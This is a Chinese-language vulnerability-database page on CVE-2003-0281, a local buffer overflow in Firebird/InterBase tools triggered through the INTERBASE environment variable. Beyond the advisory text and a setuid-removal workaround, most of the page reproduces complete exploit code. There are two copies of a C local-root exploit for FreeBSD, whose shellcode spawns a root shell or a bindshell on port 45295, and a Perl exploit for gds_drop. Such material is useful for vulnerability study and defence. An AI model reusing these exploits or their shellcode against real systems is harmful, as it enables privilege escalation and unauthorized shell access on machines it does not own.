CVE-2003-0281
CVSS4.6
发布时间 :2003-06-16 00:00:00
修订时间 :2016-10-17 22:31:42
NMCE    

[原文]Buffer overflow in Firebird 1.0.2 and other versions before 1.5, and possibly other products that use the InterBase codebase, allows local users to execute arbitrary code via a long INTERBASE environment variable when calling (1) gds_inet_server, (2) gds_lock_mgr, or (3) gds_drop.


[CNNVD]Firebird GDS_Inet_Server Interbase环境变量本地缓冲区溢出漏洞(CNNVD-200306-083)

        
        Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux, Windows和各种Unix平台下。
        Firebird包含的多个应用程序处理环境变量不正确,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以高权限在系统上执行任意指令。
        Firebird包含的gds_inet_server、gds_drop、gds_lock_mgr三个二进制程序都会调用getenv()函数获得INTERBASE环境变量,但是没有对环境变量值进行充分的缓冲区检查,攻击者提供超长字符串给环境变量,可以触发缓冲区溢出,精心构建提交数据可能以高权限(一般是root)在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0281
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0281
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-083
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105259012802997&w=2
(UNKNOWN)  BUGTRAQ  20030509 Firebird Local exploit
http://seclists.org/lists/bugtraq/2002/Jun/0212.html
(UNKNOWN)  BUGTRAQ  20020617 Interbase 6.0 malloc() issues
http://security.gentoo.org/glsa/glsa-200405-18.xml
(UNKNOWN)  GENTOO  GLSA-200405-18
http://www.securityfocus.com/bid/7546
(UNKNOWN)  BID  7546
http://xforce.iss.net/xforce/xfdb/11977
(UNKNOWN)  XF  firebird-interbase-bo(11977)

- 漏洞信息

Firebird GDS_Inet_Server Interbase环境变量本地缓冲区溢出漏洞
中危 边界条件错误
2003-06-16 00:00:00 2005-10-20 00:00:00
本地  
        
        Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux, Windows和各种Unix平台下。
        Firebird包含的多个应用程序处理环境变量不正确,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以高权限在系统上执行任意指令。
        Firebird包含的gds_inet_server、gds_drop、gds_lock_mgr三个二进制程序都会调用getenv()函数获得INTERBASE环境变量,但是没有对环境变量值进行充分的缓冲区检查,攻击者提供超长字符串给环境变量,可以触发缓冲区溢出,精心构建提交数据可能以高权限(一般是root)在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用chmod -s去掉相关应用程序S位。
        厂商补丁:
        Firebird
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.firebirdsql.org/

- 漏洞信息 (29)

Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit (EDBID:29)
bsd local
2003-05-12 Verified
0 bob
N/A [点击下载]
/* DSR-firebird.c
   -------------------------------
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is Proof Of concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( (                           by - bob@dtors.net ) )
----------------------------------------------------

Usage: ./DSR-firebird <target#> 
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop

bash-2.05a$
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
#define LEN     1056

char dropcode[]=
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" 
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
	  "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
	  "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; 

char inetcode[]=
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" 
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
	  "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
	  "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; 

                            

char lockcode[]= 
	"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
	"\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
	"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" //setuid[firebird] by 
bob
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53" //fork() bindshell by eSDee
	"\xb3\x01\x53\xb3\x02\x53\x54\xb0"
	"\x61\xcd\x80\x89\xc7\x31\xc0\x50"
	"\x50\x50\x66\x68\xb0\xef\xb7\x02"
      "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
      "\x53\x51\x57\x50\xb0\x68\xcd\x80"
      "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
      "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
      "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
      "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
      "\xe2\x50\x51\x52\xb3\x14\x53\x50"
      "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
      "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
      "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
      "\x39\xc3\x75\x44\x31\xc0\x57\x50"
      "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
      "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
      "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
      "\x80\x31\xc0\x43\x53\x56\x50\xb0"
      "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
      "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
      "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
      "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
      "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
      "\xeb\x9a";

char *decide(char *string)
{
    if(!(strcmp(string, "1")))
      return((char *)&inetcode);
    if(!(strcmp(string, "2")))
      return((char *)&lockcode);
    if(!(strcmp(string, "3")))
      return((char *)&dropcode);
    exit(0);
}

int main(int argc, char **argv)
{
	
	unsigned long ret = 0xbfbff743;
	  
	char *selectcode;
	char buffer[LEN];
	char egg[1024];
	char *ptr;
	int i=0;

  

	if(argc < 2)
	{
		printf("( ( Firebird-1.0.2 Local exploit for Freebsd 
4.7 ) )\n"); 
		printf("( (                           by - 
bob@dtors.net ) )\n");
		printf("---------------------------------------------------
-\n\n");
		printf("Usage: %s <target#> \n", argv[0]);
		printf("Targets:\n");
		printf("1. [0xbfbff743] - gds_inet_server\n");
		printf("2. [0xbfbff743] - gds_lock_mgr\n");
		printf("3. [0xbfbff743] - gds_drop\n");
		printf("\nwww.dtors.net\n");
		exit(0);
	}
  
	selectcode = (char *)decide(argv[1]);
  	memset(buffer, 0x41, sizeof(buffer));

        ptr = egg;

        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
        egg[1024 - 1] = '\0';

        memcpy(egg,"EGG=",4);
        putenv(egg);

        memcpy(&buffer[1052],(char *)&ret,4);
        buffer[1056] = 0;

        setenv("INTERBASE", buffer, 1);

        fprintf(stdout, "Return Address: 0x%x\n", ret);
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

if(selectcode == (char *)&inetcode)
  {
	execl(INET, INET, NULL);
	return 0;
   }

if(selectcode == (char *)&lockcode)
  {
 	printf("\nShell is on port 45295\nExploit will hang!\n");
	execl(LOCK, LOCK, NULL);
	return 0;
   }

if(selectcode == (char *)&dropcode)
  {
	execl(DROP, DROP, NULL);
	return 0;
   }

	
	return 0;
}


// milw0rm.com [2003-05-12]
		

- 漏洞信息 (21565)

Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (1) (EDBID:21565)
unix local
2002-06-15 Verified
0 stripey
N/A [点击下载]
source: http://www.securityfocus.com/bid/5044/info

Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.

A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.

Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue. *

#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc  = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

$buf  = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_drop");

		

- 漏洞信息 (21566)

Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (2) (EDBID:21566)
unix local
2002-06-18 Verified
0 bob
N/A [点击下载]
source: http://www.securityfocus.com/bid/5044/info
 
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
 
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
 
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.

/* DSR-firebird.c by bob@dtors.net
   -------------------------------

Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE

bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( (                           by - bob@dtors.net ) )
----------------------------------------------------

Usage: ./DSR-firebird <target#>
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop

www.dtors.net
bash-2.05a$

Thanks goto eSDee && ilja for helping me
with the gds_lock_mgr problems.

bob@dtors.net
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
#define LEN     1056

char dropcode[]=
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
   "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
   "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

char inetcode[]=
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
   "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
   "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



char lockcode[]=
 "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
 "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
 "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" file://setuid[firebird] by bob
 "\x31\xc0\x31\xdb\x53\xb3\x06\x53" file://fork() bindshell by eSDee
 "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
 "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
 "\x50\x50\x66\x68\xb0\xef\xb7\x02"
      "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
      "\x53\x51\x57\x50\xb0\x68\xcd\x80"
      "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
      "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
      "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
      "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
      "\xe2\x50\x51\x52\xb3\x14\x53\x50"
      "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
      "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
      "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
      "\x39\xc3\x75\x44\x31\xc0\x57\x50"
      "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
      "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
      "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
      "\x80\x31\xc0\x43\x53\x56\x50\xb0"
      "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
      "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
      "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
      "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
      "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
      "\xeb\x9a";

char *decide(char *string)
{
    if(!(strcmp(string, "1")))
      return((char *)&inetcode);
    if(!(strcmp(string, "2")))
      return((char *)&lockcode);
    if(!(strcmp(string, "3")))
      return((char *)&dropcode);
    exit(0);
}

int main(int argc, char **argv)
{

 unsigned long ret = 0xbfbff743;

 char *selectcode;
 char buffer[LEN];
 char egg[1024];
 char *ptr;
 int i=0;



 if(argc < 2)
 {
  printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
  printf("( (                           by - bob@dtors.net ) )\n");
  printf("----------------------------------------------------\n\n");
  printf("Usage: %s <target#> \n", argv[0]);
  printf("Targets:\n");
  printf("1. [0xbfbff743] - gds_inet_server\n");
  printf("2. [0xbfbff743] - gds_lock_mgr\n");
  printf("3. [0xbfbff743] - gds_drop\n");
  printf("\nwww.dtors.net\n");
  exit(0);
 }

 selectcode = (char *)decide(argv[1]);
   memset(buffer, 0x41, sizeof(buffer));

        ptr = egg;

        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
        egg[1024 - 1] = '\0';

        memcpy(egg,"EGG=",4);
        putenv(egg);

        memcpy(&buffer[1052],(char *)&ret,4);
        buffer[1056] = 0;

        setenv("INTERBASE", buffer, 1);

        fprintf(stdout, "Return Address: 0x%x\n", ret);
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

if(selectcode == (char *)&inetcode)
  {
 execl(INET, INET, NULL);
 return 0;
   }

if(selectcode == (char *)&lockcode)
  {
  printf("\nShell is on port 45295\nExploit will hang!\n");
 execl(LOCK, LOCK, NULL);
 return 0;
   }

if(selectcode == (char *)&dropcode)
  {
 execl(DROP, DROP, NULL);
 return 0;
   }


 return 0;
}
		
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站